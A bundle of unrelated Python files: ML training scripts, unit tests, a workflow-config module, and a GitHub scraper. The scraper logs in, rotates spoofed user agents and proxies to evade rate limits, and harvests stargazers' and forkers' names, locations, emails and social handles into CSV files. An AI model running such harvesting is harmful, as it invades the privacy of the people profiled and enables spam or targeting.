if k and not (keyword == k) and k in keyword and len(k) <= max_keyword_length and p > importance_threshold:
related_keywords.add(k)
for r in related_keywords:
keyword_prob_mass[r] += prob/len(related_keywords)
keyword_prob_list = sorted(
keyword_prob_mass.items(),
key=lambda x: x[1],
reverse=True)
return keyword_prob_list
|
import os
import numpy as np
import pytest
import pytorch_lightning as pl
import torch.optim.optimizer
from omegaconf import OmegaConf
from pl_bolts.models.vision import UNet
from pytorch_lightning import seed_everything, Trainer
from src.datamodules.DivaHisDB.datamodule_cropped import DivaHisDBDataModuleCropped
from src.tasks.DivaHisDB.semantic_segmentation_cropped import SemanticSegmentationCroppedHisDB
from src.tasks.utils.outputs import OutputKeys
from tests.tasks.test_base_task import fake_log
from tests.test_data.dummy_data_hisdb.dummy_data import data_dir_cropped
@pytest.fixture(autouse=True)
def clear_resolvers():
OmegaConf.clear_resolvers()
seed_everything(42)
os.environ['MKL_SERVICE_FORCE_INTEL'] = '1'
@pytest.fixture()
def model():
return UNet(num_classes=4, num_layers=2, features_start=32)
@pytest.fixture()
def datamodule_and_dir(data_dir_cropped):
# datamodule
data_module = DivaHisDBDataModuleCropped(
data_dir=str(data_dir_cropped),
data_folder_name='data', gt_folder_name='gt',
batch_size=2, num_workers=2)
return data_module, data_dir_cropped
@pytest.fixture()
def task(model, tmp_path):
task = SemanticSegmentationCroppedHisDB(model=model,
optimizer=torch.optim.Adam(params=model.parameters()),
loss_fn=torch.nn.CrossEntropyLoss(),
test_output_path=tmp_path,
confusion_matrix_val=True
)
return task
def test_semantic_segmentation(tmp_path, task, datamodule_and_dir):
data_module, data_dir_cropped = datamodule_and_dir
# different paths needed later
patches_path = task.test_output_path / 'patches'
test_data_patch = data_dir_cropped / 'test' / 'data'
trainer = pl.Trainer(max_epochs=2, precision=32, default_root_dir=task.test_output_path,
accelerator='ddp_cpu')
trainer.fit(task, datamodule=data_module)
results = trainer.test()
print(results)
assert np.isclose(results[0]['test/crossentropyloss'], 1.0896027088165283, rtol=2e-03)
assert np.isclose(results[0]['test/crossentropyloss_epoch'], 1.0896027088165283, rtol=2e-03)
assert len(list(patches_path.glob('*/*.npy'))) == len(list(test_data_patch.glob('*/*.png')))
def test_to_metrics_format():
x = torch.as_tensor([[1, 2, 3], [0, 1, 2]])
y = SemanticSegmentationCroppedHisDB.to_metrics_format(x)
assert torch.equal(torch.as_tensor([2, 2]), y)
def test_training_step(monkeypatch, datamodule_and_dir, task, capsys):
data_module_cropped, data_dir_cropped = datamodule_and_dir
trainer = Trainer()
monkeypatch.setattr(data_module_cropped, 'trainer', trainer)
monkeypatch.setattr(task, 'trainer', trainer)
monkeypatch.setattr(trainer, 'datamodule', data_module_cropped)
monkeypatch.setattr(task, 'log', fake_log)
data_module_cropped.setup('fit')
img, gt, mask = data_module_cropped.train[0]
output = task.training_step(batch=(img[None, :], gt[None, :], mask[None, :]), batch_idx=0)
assert 'train/crossentropyloss 1.4' in capsys.readouterr().out
assert np.isclose(output[OutputKeys.LOSS].item(), 1.4348618984222412, rtol=2e-03)
def test_validation_step(monkeypatch, datamodule_and_dir, task, capsys):
data_module_cropped, data_dir_cropped = datamodule_and_dir
trainer = Trainer()
monkeypatch.setattr(data_module_cropped, 'trainer', trainer)
monkeypatch.setattr(task, 'trainer', trainer)
monkeypatch.setattr(trainer, 'datamodule', data_module_cropped)
monkeypatch.setattr(task, 'log', fake_log)
monkeypatch.setattr(task, 'confusion_matrix_val', False)
data_module_cropped.setup('fit')
img, gt, mask = data_module_cropped.val[0]
task.validation_step(batch=(img[None, :], gt[None, :], mask[None, :]), batch_idx=0)
assert 'val/crossentropyloss 1.4' in capsys.readouterr().out
def test_test_step(monkeypatch, datamodule_and_dir, task, capsys, tmp_path):
data_module_cropped, data_dir_cropped = datamodule_and_dir
trainer = Trainer()
monkeypatch.setattr(data_module_cropped, 'trainer', trainer)
monkeypatch.setattr(task, 'trainer', trainer)
monkeypatch.setattr(trainer, 'datamodule', data_module_cropped)
monkeypatch.setattr(task, 'log', fake_log)
monkeypatch.setattr(task, 'confusion_matrix_val', False)
monkeypatch.setattr(task, 'test_output_path', tmp_path)
data_module_cropped.setup('test')
img, gt, mask, idx = data_module_cropped.test[0]
idx_tensor = torch.as_tensor([idx])
task.test_step(batch=(img[None, :], gt[None, :], mask[None, :], idx_tensor), batch_idx=0)
assert 'test/crossentropyloss 1.4' in capsys.readouterr().out
assert (tmp_path / 'patches').exists()
assert (tmp_path / 'patches' / 'e-codices_fmb-cb-0055_0098v_max').exists()
assert len(list((tmp_path / 'patches' / 'e-codices_fmb-cb-0055_0098v_max').iterdir())) == 1
|
<reponame>WenjieDu/GitHub_Spider_on_Star_Fork
"""
This spider is created by WenjieDu to crawl information of stargazers and forkers of specified repositories on GitHub.
"""
import argparse
import json
import logging
import os
import random
from time import sleep
import pandas as pd
import requests
from bs4 import BeautifulSoup
##################################################################################################
# Here are configurations you have to set
##################################################################################################
# repos that you want to crawl star and fork user info from
SPECIFIED_REPOS = [
]
# repos that you want to use for filtering
FILTERING_REPOS = [
]
# users that you want to manually exclude
EXCLUSION_USERS = [
]
USE_PROXY = False # whether to use proxy
PROXY_POOL_URL = 'http://127.0.0.1:8000' # pool url where you fetch proxies
# Manual configurations end here
##################################################################################################
SITE_DOMAIN = 'https://github.com'
STAR = "stargazers"
FORK = "network/members"
# STAR PLACEHOLDER start from 1
STAR_SELECTOR = "#repos > ol"
# FORK PLACEHOLDER start from 2
FORK_SELECTOR = "#network"
# user info selector
FULL_NAME_SELECTOR = "#js-pjax-container > div.container-xl.px-3.px-md-4.px-lg-5 > div > div.Layout-sidebar > div > div.js-profile-editable-replace > div.clearfix.d-flex.d-md-block.flex-items-center.mb-4.mb-md-0 > div.vcard-names-container.float-left.js-profile-editable-names.col-12.py-3.js-sticky.js-user-profile-sticky-fields > h1 > span.p-name.vcard-fullname.d-block.overflow-hidden"
LOCATION_SELECTOR = "#js-pjax-container > div.container-xl.px-3.px-md-4.px-lg-5 > div > div.Layout-sidebar > div > div.js-profile-editable-replace > div.d-flex.flex-column > div.js-profile-editable-area.d-flex.flex-column.d-md-block > ul > li.vcard-detail.pt-1.css-truncate.css-truncate-target.hide-sm.hide-md > span.p-label"
COMPANY_SELECTOR = "#js-pjax-container > div.container-xl.px-3.px-md-4.px-lg-5 > div > div.Layout-sidebar > div > div.js-profile-editable-replace > div.d-flex.flex-column > div.js-profile-editable-area.d-flex.flex-column.d-md-block > ul > li.vcard-detail.pt-1.css-truncate.css-truncate-target.hide-sm.hide-md > span.p-org > div"
EMAIL_SELECTOR = "#js-pjax-container > div.container-xl.px-3.px-md-4.px-lg-5 > div > div.Layout-sidebar > div > div.js-profile-editable-replace > div.d-flex.flex-column > div.js-profile-editable-area.d-flex.flex-column.d-md-block > ul > li> a.u-email"
WEBSITE_SELECTOR = "#js-pjax-container > div.container-xl.px-3.px-md-4.px-lg-5 > div > div.Layout-sidebar > div > div.js-profile-editable-replace > div.d-flex.flex-column > div.js-profile-editable-area.d-flex.flex-column.d-md-block > ul > li[itemprop=url] > a"
TWITTER_SELECTOR = "#js-pjax-container > div.container-xl.px-3.px-md-4.px-lg-5 > div > div.Layout-sidebar > div > div.js-profile-editable-replace > div.d-flex.flex-column > div.js-profile-editable-area.d-flex.flex-column.d-md-block > ul > li.hide-md > a"
USER_AGENTS = [
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)",
"Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)",
"Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)",
"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)",
"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0",
"Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5",
"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.11 TaoBrowser/2.0 Safari/536.11",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; LBBROWSER)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E; LBBROWSER)",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 LBBROWSER",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; QQBrowser/7.0.3698.400)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SV1; QQDownload 732; .NET4.0C; .NET4.0E; 360SE)",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; QQDownload 732; .NET4.0C; .NET4.0E)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1",
"Mozilla/5.0 (iPad; U; CPU OS 4_2_1 like Mac OS X; zh-cn) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b13pre) Gecko/20110307 Firefox/4.0b13pre",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
"Mozilla/5.0 (X11; U; Linux x86_64; zh-CN; rv:1.9.2.10) Gecko/20100922 Ubuntu/10.10 (maverick) Firefox/3.6.10"
]
def get_header():
return {
'User-Agent': random.choice(USER_AGENTS),
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Connection': 'keep-alive',
'Accept-Encoding': 'gzip, deflate',
}
def setup_logger(log_file_path, mode='a'):
logger = logging.getLogger()
logger.setLevel(logging.INFO)
fh = logging.FileHandler(log_file_path, mode=mode)
fh.setLevel(logging.INFO)
ch = logging.StreamHandler()
ch.setLevel(logging.INFO)
formatter = logging.Formatter('%(asctime)s - %(message)s')
fh.setFormatter(formatter)
ch.setFormatter(formatter)
# add the handlers to the logger
logger.addHandler(fh)
logger.addHandler(ch)
return logger
def get_proxy():
if random.randint(0, 10) > 4: # 50% to use proxy, you can adjust it if you like
all_proxies = json.loads(requests.get(PROXY_POOL_URL).text)
all_proxies = [i for i in all_proxies if i[2] > 4]
# logger.info(f'Total proxy num: {len(all_proxies)}')
picked = random.choice(all_proxies)
return {'http': f'http://{picked[0]}:{picked[1]}'}
else:
sleep(2) # if use local ip, then set delay
return None
def request_url(url, sess=None):
while True:
try:
header = get_header()
picked_proxy = get_proxy() if USE_PROXY else None
if sess:
response = sess.get(url, headers=header, timeout=(25, 30), proxies=picked_proxy)
else:
response = requests.get(url, headers=header, timeout=(25, 30), proxies=picked_proxy)
except:
# logger.info('Proxy failed once, try again')
continue
if response.status_code == 200:
break
else:
sleep(3)
logger.info('Request failed once, try again')
return BeautifulSoup(response.text, 'lxml')
def crawl_user_from_repos(repos):
""" crawl star and fork users from specified repos
:param repos: specified github repo names
:return: crawled users in one list
"""
users = set()
for repo in repos:
repo_url = os.path.join(SITE_DOMAIN, repo)
logger.info(f'Start to crawl info from repo {repo_url}')
repo_star_page = os.path.join(repo_url, STAR)
repo_fork_page = os.path.join(repo_url, FORK)
star_set, fork_set = [], []
# request docs of star page and gather stargazers, num of stargazer page may be more than one
logger.info(f'Crawling {repo_star_page}...')
soup = request_url(repo_star_page)
while True:
stargazer_block = soup.select_one(STAR_SELECTOR) # select the whole block
stargazer_block = set([i for i in stargazer_block])
stargazer_block.remove('\n')
for i in stargazer_block:
star_set.append(
i.select_one("div > div.ml-3.flex-auto.min-width-0 > h3 > span > span > a").text
)
next_page = soup.select("#repos > div.paginate-container > div > a")
if next_page and next_page[-1].text == 'Next':
soup = request_url(next_page[-1]['href'])
else:
break
# request docs of fork page and gather forkers, forkers are all on one page
logger.info(f'Crawling {repo_fork_page}...')
soup = request_url(repo_fork_page)
forker_block = soup.select_one(FORK_SELECTOR) # select the whole block
forker_block = set([i for i in forker_block][2:]) # the first two need to be removed
forker_block.remove('\n')
for i in forker_block:
fork_set.append(i.select_one("div> a:nth-child(3)").text)
# get union of stargazers and forkers
union_set = set(star_set).union(set(fork_set))
users = users.union(union_set)
return set(users)
def crawl_user_info(users, sess):
""" craw user info from their profile page
:param users:
:param sess: session with github account login. Email info is not available if the session is invalid.
:return: crawled user info in pandas dataframe
"""
df = pd.DataFrame(
columns=['user', 'full_name', 'location', 'company', 'email', 'website', 'twitter']
)
for user in users:
logger.info(f'Crawling info of user {user}...')
user_page = os.path.join(SITE_DOMAIN, user)
# request docs of user page and gather user info
soup = request_url(user_page, sess)
try:
full_name = soup.select_one(FULL_NAME_SELECTOR).text
except:
full_name = None
try:
location = soup.select_one(LOCATION_SELECTOR).text
except:
location = None
try:
company = soup.select_one(COMPANY_SELECTOR).text
except:
company = None
try:
email = soup.select_one(EMAIL_SELECTOR).text
except:
email = None
try:
website = soup.select_one(WEBSITE_SELECTOR).text
except:
website = None
try:
twitter = soup.select_one(TWITTER_SELECTOR).text
except:
twitter = None
info_dict = {'user': user,
'full_name': full_name,
'location': location,
'company': company,
'email': email,
'website': website,
'twitter': twitter}
df = df.append(info_dict, ignore_index=True)
return df
def bool(op):
if op.lower() == ('true' or 'yes' or 'y' or 't'):
return True
else:
return False
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--crawl_different_users', type=bool, default=True,
help='whether to crawl detailed info of different users')
parser.add_argument('--crawl_same_users', type=bool, default=False,
help='whether to crawl detailed info of same users')
parser.add_argument('--ensure_successful_github_login', type=bool, default=True,
help='whether to ensure login github successful, namely you want to crawl emails')
args = parser.parse_args()
logger = setup_logger("spider.log", mode='w')
logger.info(args)
# crawl users that already star or fork EXCLUSION_REPOS
interested_users = crawl_user_from_repos(SPECIFIED_REPOS)
excluded_users = crawl_user_from_repos(FILTERING_REPOS)
if len(EXCLUSION_USERS) > 0:
excluded_users = excluded_users.union(set(EXCLUSION_USERS))
different_users = list(
set(interested_users).difference(set(excluded_users))
)
same_users = list(
set(interested_users).intersection(set(excluded_users))
)
logger.info(f"Got {len(different_users)} different users: \n {different_users}")
logger.info(f"Got {len(same_users)} same users: \n {same_users}")
if args.crawl_same_users or args.crawl_different_users:
with open('github_credential.json') as f:
credential = json.load(f)
github_username = credential["username"]
github_password = credential["password"]
login_url = 'https://github.com/login'
session_url = 'https://github.com/session'
with requests.session() as session:
# login github
logger.info('Signing in GitHub...')
login_html = session.get(login_url).content.decode()
bs = BeautifulSoup(login_html, features="html.parser")
input_label = bs.find(attrs={"name": "authenticity_token"})
authenticity_token = input_label.attrs["value"]
# build request arguments for login api
data = {
"commit": "Sign in",
"authenticity_token": authenticity_token,
"login": github_username,
"password": <PASSWORD>,
"webauthn-support": "supported"
}
session.post(session_url, data=data)
response = session.get("https://github.com/settings/profile")
settings_html = session.get("https://github.com/settings/profile").content.decode()
bs = BeautifulSoup(settings_html, features="html.parser")
if bs.title.string == "Your Profile":
logger.info('Login successfully.')
else:
logger.warning('Login failed. Please check your github username and password.')
if args.ensure_successful_github_login:
logger.error('Quit now because of failed login.')
quit()
# crawling user info
if args.crawl_same_users:
logger.info('Crawling info_same_users...')
info_same_users = crawl_user_info(same_users, session)
logger.info('Saving info_same_users into csv file...')
info_same_users.to_csv('crawled_same_users.csv')
if args.crawl_different_users:
logger.info('Crawling info_different_users...')
info_different_users = crawl_user_info(different_users, session)
logger.info('Saving info_different_users into csv file...')
info_different_users.to_csv('crawled_different_users.csv')
logger.info('All finished.')
|
"""
pyt_pima_diabetes.py: binary classification (of imbalanced data) of PIMA Diabates dataset
@author: <NAME>
My experiments with Python, Machine Learning & Deep Learning.
This code is meant for education purposes only & is not intended for commercial/production use!
Use at your own risk!! I am not responsible if your CPU or GPU gets fried :D
"""
import pytorch_toolkit as pytk
from torch.utils.data import Dataset
import torch.nn.functional as F
import torch.nn as nn
import torch
import seaborn as sns
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import random
import sys
import os
import warnings
warnings.filterwarnings('ignore')
# tweaks for libraries
np.set_printoptions(precision=6, linewidth=1024, suppress=True)
plt.style.use('seaborn')
sns.set_style('darkgrid')
sns.set_context('notebook', font_scale=1.10)
# Pytorch imports
print('Using Pytorch version: ', torch.__version__)
# import pytorch_toolkit - training Nirvana :)
# to ensure that you get consistent results across runs & machines
# @see: https://discuss.pytorch.org/t/reproducibility-over-different-machines/63047
SEED = 41
random.seed(SEED)
os.environ['PYTHONHASHSEED'] = str(SEED)
np.random.seed(SEED)
torch.manual_seed(SEED)
if torch.cuda.is_available():
torch.cuda.manual_seed(SEED)
torch.cuda.manual_seed_all(SEED)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.enabled = False
url = r'https://raw.githubusercontent.com/a-coders-guide-to-ai/a-coders-guide-to-neural-networks/master/data/diabetes.csv'
local_data_path = './data/diabetes.csv'
def load_data(upsample=False, test_split=0.20):
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
if not os.path.exists(local_data_path):
print('Fetching data from URL...')
df = pd.read_csv(url)
df.to_csv(local_data_path)
else:
df = pd.read_csv(local_data_path, index_col=0)
print(df.shape)
print(df.head())
X = df.iloc[:, :-1].values
y = df.iloc[:, -1].values
print(
f"Raw data shapes -> X.shape: {X.shape} - y.shape: {y.shape} - label dist: {np.bincount(y)}")
# split into train/test sets
X_train, X_test, y_train, y_test = \
train_test_split(X, y, test_size=test_split,
random_state=SEED, stratify=y)
if upsample:
difference = sum((y_train == 0)*1) - sum((y_train == 1)*1)
indices = np.where(y_train == 1)[0]
rand_subsample = np.random.randint(0, len(indices), (difference,))
X_train = np.concatenate((X_train, X_train[indices[rand_subsample]]))
y_train = np.concatenate((y_train, y_train[indices[rand_subsample]]))
X_train, X_val, y_train, y_val = \
train_test_split(X_train, y_train, test_size=test_split,
random_state=SEED, stratify=y_train)
# scale data
ss = StandardScaler()
X_train = ss.fit_transform(X_train)
X_val = ss.transform(X_val)
X_test = ss.transform(X_test)
y_train = np.expand_dims(y_train, axis=1)
y_val = np.expand_dims(y_val, axis=1)
y_test = np.expand_dims(y_test, axis=1)
print(f"X_train.shape: {X_train.shape} - y_train.shape: {y_train.shape}\n" +
f"X_val.shape: {X_val.shape} - y_val.shape: {y_val.shape}\n" +
f"X_test.shape: {X_test.shape} - y_test.shape: {y_test.shape}")
return (X_train, y_train), (X_val, y_val), (X_test, y_test)
class PimaDataset(Dataset):
def __init__(self, X, y):
super(PimaDataset, self).__init__()
self.X = torch.FloatTensor(X)
self.y = torch.FloatTensor(y)
def __len__(self):
return len(self.X)
def __getitem__(self, item):
X_ret = self.X[item]
y_ret = self.y[item]
return X_ret, y_ret
# our ANN
class PimaModel(pytk.PytkModule):
def __init__(self):
super(PimaModel, self).__init__()
self.fc1 = nn.Linear(8, 16)
self.fc2 = nn.Linear(16, 8)
self.fc3 = nn.Linear(8, 4)
self.out = nn.Linear(4, 1)
def forward(self, inp):
x = F.relu(self.fc1(inp))
x = F.dropout(x, p=0.20, training=self.training)
x = F.relu(self.fc2(x))
x = F.dropout(x, p=0.20, training=self.training)
x = F.relu(self.fc3(x))
x = F.sigmoid(self.out(x))
return x
DO_TRAINING = True
DO_TESTING = False
DO_PREDICTION = False
MODEL_SAVE_PATH = './model_states/pyt_diabetes_ann'
# Hyper-parameters
NUM_FEATURES = 30
NUM_CLASSES = 1
NUM_EPOCHS = 2500
BATCH_SIZE = 32
LEARNING_RATE = 1e-3
DECAY = 0.005
def main():
(X_train, y_train), (X_val, y_val), (X_test, y_test) = load_data(upsample=True)
train_dataset = PimaDataset(X_train, y_train)
val_dataset = PimaDataset(X_val, y_val)
test_dataset = PimaDataset(X_test, y_test)
if DO_TRAINING:
print('Building model...')
model = PimaModel()
# define the loss function & optimizer that model should
loss_fn = nn.BCELoss() # nn.CrossEntropyLoss()
# optimizer = torch.optim.SGD(
# model.parameters(), lr=LEARNING_RATE, weight_decay=DECAY)
optimizer = torch.optim.Adam(
model.parameters(), lr=LEARNING_RATE, weight_decay=DECAY)
model.compile(loss=loss_fn, optimizer=optimizer, metrics=['acc'])
print(model)
# train model
print('Training model...')
# split training data into train/cross-val datasets in 80:20 ratio
hist = model.fit_dataset(train_dataset, validation_dataset=val_dataset,
epochs=NUM_EPOCHS, batch_size=BATCH_SIZE, report_interval=100)
pytk.show_plots(hist, metric='acc',
plot_title="Performance Metrics")
# evaluate model performance on train/eval & test datasets
print('\nEvaluating model performance...')
loss, acc = model.evaluate_dataset(train_dataset)
print(f" Training dataset -> loss: {loss:.4f} - acc: {acc:.4f}")
loss, acc = model.evaluate_dataset(val_dataset)
print(f" Cross-val dataset -> loss: {loss:.4f} - acc: {acc:.4f}")
loss, acc = model.evaluate_dataset(test_dataset)
print(f" Testing dataset -> loss: {loss:.4f} - acc: {acc:.4f}")
# save model state
model.save(MODEL_SAVE_PATH)
del model
if DO_PREDICTION:
print('\nRunning predictions...')
model = pytk.load_model(MODEL_SAVE_PATH)
_, y_pred = model.predict_dataset(X_test)
# display output
print('Sample labels: ', y_test.flatten())
print('Sample predictions: ', y_pred)
print('We got %d/%d correct!' %
((y_test.flatten() == y_pred).sum(), len(y_test.flatten())))
if __name__ == "__main__":
main()
# --------------------------------------------------
# Results:
# MLP with epochs=100, batch-size=16, LR=0.001
# Training -> acc: 98.63, f1-score: 98.11
# Testing -> acc: 99.22, f1-score: 99.06
# --------------------------------------------------
|
# coding=utf-8
"""Module for handling workflow definition objects.
Intended for registering a new workflow type with the Configuration database.
"""
import ast
import json
from os.path import dirname, join
import jsonschema
from .. import ConfigDb
DB = ConfigDb()
def add(workflow_definition: dict, templates_root: str):
"""Add a workflow definition to the Configuration Database.
Templates are expected to be found in a directory tree with the following
structure:
- workflow_id:
|- workflow_version
|- stage_id
|- stage_version
|- <templates>
Args:
workflow_definition (dict): Workflow definition.
templates_root (str): Workflow templates root path
"""
schema_path = join(dirname(__file__), 'schema', 'workflow_definition.json')
with open(schema_path, 'r') as file:
schema = json.loads(file.read())
jsonschema.validate(workflow_definition, schema)
_id = workflow_definition['id']
_version = workflow_definition['version']
_load_templates(workflow_definition, templates_root)
workflow_id = workflow_definition['id']
version = workflow_definition['version']
name = "workflow_definitions:{}:{}".format(workflow_id, version)
if DB.get_keys(name):
raise KeyError('Workflow definition already exists: {}'.format(name))
# DB.set_hash_values(name, workflow_definition)
DB.save_dict(name, workflow_definition, hierarchical=False)
def register(workflow_id, workflow_version):
"""Register an (empty) workflow definition in the database."""
name = "workflow_definitions:{}:{}".format(workflow_id, workflow_version)
workflow_definition = dict(id=workflow_id, version=workflow_version,
stages=[])
# DB.set_hash_values(name, workflow_definition)
DB.save_dict(name, workflow_definition, hierarchical=False)
def delete(workflow_id: str = None, workflow_version: str = None):
"""Delete workflow definitions.
Args:
workflow_id (str, optional): Optional workflow identifier
workflow_version (str, optional): Optional workflow identifier version
If workflow_id and workflow_version are None, delete all workflow
definitions.
"""
if workflow_id is None and workflow_version is None:
keys = DB.get_keys("workflow_definitions:*")
DB.delete(*keys)
elif workflow_id is not None and workflow_version is None:
keys = DB.get_keys("workflow_definitions:{}:*".format(workflow_id))
DB.delete(*keys)
elif workflow_id is None and workflow_version is not None:
keys = DB.get_keys("workflow_definitions:*:{}"
.format(workflow_version))
DB.delete(*keys)
else:
name = "workflow_definitions:{}:{}".format(workflow_id,
workflow_version)
DB.delete(name)
def get_workflow(workflow_id: str, workflow_version: str) -> dict:
"""Get a workflow definition from the Configuration Database.
Args:
workflow_id (str): Workflow identifier
workflow_version (str): Workflow version
Returns:
dict, Workflow definition dictionary
"""
name = "workflow_definitions:{}:{}".format(workflow_id, workflow_version)
workflow = DB.get_hash_dict(name)
workflow['stages'] = ast.literal_eval(workflow['stages'])
return workflow
def get_workflows() -> dict:
"""Get dict of ALL known workflow definitions.
Returns
list[dict]
"""
keys = DB.get_keys("workflow_definitions:*")
known_workflows = dict()
for key in keys:
values = key.split(':')
if values[1] not in known_workflows:
known_workflows[values[1]] = list()
known_workflows[values[1]].append(values[2])
return known_workflows
def _load_templates(workflow: dict, templates_root: str):
"""Load templates keys."""
workflow_template_path = join(templates_root, workflow['id'],
workflow['version'])
for i, stage_config in enumerate(workflow['stages']):
stage_template_path = join(workflow_template_path,
stage_config['id'],
stage_config['version'])
for config_type in ['ee_config', 'app_config']:
for key, value in stage_config[config_type].items():
if 'template' in key:
template_file = join(stage_template_path, value)
with open(template_file, 'r') as file:
template_str = file.read()
workflow['stages'][i][config_type][key] = template_str
|
from nose.tools import assert_raises
from syn.types.a import ValueExplorer, ExplorationError, DiffExplorer, \
visit, find_ne
from syn.base_utils import capture, assign
import syn.base_utils.repl as repl
#-------------------------------------------------------------------------------
# NETypes
def test_netypes():
from syn.types.a import NEType, NotEqual, DiffersAtIndex, DiffersAtKey, \
DifferentLength, DifferentTypes, SetDifferences, KeyDifferences, \
DiffersAtAttribute
class Foo(object):
def __init__(self, a):
self.a = a
n = NEType(1, 2)
assert str(n) == repr(n)
x = n.explorer()
assert x.current_value == (1, 2)
assert n == NEType(1, 2)
assert n != NEType(1, 3)
assert n != NotEqual(1, 2)
n = NotEqual(1, 2)
assert str(n) == '1 != 2'
accum = []
def fake_explorer():
def func():
accum.append(1)
return func
assert sum(accum) == 0
with capture() as (out, err):
with assign(n, 'explorer', fake_explorer):
n()
assert sum(accum) == 1
assert out.getvalue() == '1 != 2\n'
l1 = [1, 2, 3]
l2 = [1, 4, 3]
n = DiffersAtIndex(l1, l2, 1)
assert n.explorer().current_value == (2, 4)
assert n.message() == 'Sequences differ at index 1: 2 != 4'
assert DiffersAtIndex(l1, l2, 1) == DiffersAtIndex(l1, l2, 1)
assert DiffersAtIndex(l1, l2, 1) != DiffersAtIndex(l1, l2, 2)
assert DiffersAtIndex(l1, l2, 1) != DiffersAtIndex(l1, l1, 1)
d1 = dict(a=1, b=2)
d2 = dict(a=1, b=3)
n = DiffersAtKey(d1, d2, key='b')
assert n.explorer().current_value == (2, 3)
assert n.message() == 'Mappings differ at key "b": 2 != 3'
assert DiffersAtKey(d1, d2, 'a') == DiffersAtKey(d1, d2, 'a')
